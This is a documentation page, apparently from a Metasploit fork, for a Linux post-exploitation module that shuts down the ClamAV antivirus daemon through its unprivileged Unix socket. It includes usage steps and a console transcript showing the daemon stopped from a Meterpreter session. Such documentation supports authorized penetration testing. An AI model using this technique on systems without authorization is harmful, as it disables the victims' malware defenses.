adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/post/linux/manage/disable_clamav.md
T
h00die 557a15a115 spelling fixes on docs
2023-10-10 14:46:18 -04:00

56 lines
2.1 KiB
Markdown
Raw Blame History

### Description
This module will cause the ClamAV service to be shutoff on Linux hosts.
ClamAV uses a Unix socket that allows non-privileged users to interact with the ClamAV daemon via utilities like "clamscan".
However, no additional checks are required to trigger ClamAV's shutdown.
## Verification Steps
### Shutting off ClamAV
1. Launch `msfconsole`
2. Get a Meterpreter shell on a Linux host that's also running ClamAV.
3. Do: `use post/linux/manage/disable_clamav`
4. Do: `set SESSION <session number on the Linux host>`
6. Do: `exploit -j`
7. The daemon should be shutoff.
## Scenarios
```
msf6 post(linux/manage/disable_clamav) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
4 meterpreter x86/linux dllcoolj @ 192.168.130.1 127.0.0.1:4444 -> 127.0.0.1:38360 (127.0.0.1)
msf6 post(linux/manage/disable_clamav) > show options
Module options (post/linux/manage/disable_clamav):
Name Current Setting Required Description
---- --------------- -------- -----------
CLAMAV_UNIX_SOCKET /run/clamav/clamd.ctl yes ClamAV unix socket
SESSION 4 yes The session to run this module on
View the full module info with the info, or info -d command.
msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
[*] exec: ps -ef | grep 'clamd'
clamav 132021 1 16 18:51 ? 00:00:09 clamd
dllcoolj 132533 71177 0 18:52 pts/3 00:00:00 sh -c ps -ef | grep 'clamd'
dllcoolj 132535 132533 0 18:52 pts/3 00:00:00 grep clamd
msf6 post(linux/manage/disable_clamav) > exploit -j
[*] Post module running as background job 10.
msf6 post(linux/manage/disable_clamav) >
[*] Checking file path /run/clamav/clamd.ctl exists and is writable...
[+] File does exist and is writable!
[*] Shutting down ClamAV!
msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
[*] exec: ps -ef | grep 'clamd'
dllcoolj 132927 132925 0 18:52 pts/3 00:00:00 grep clamd
```
Reference in New Issue View Git Blame Copy Permalink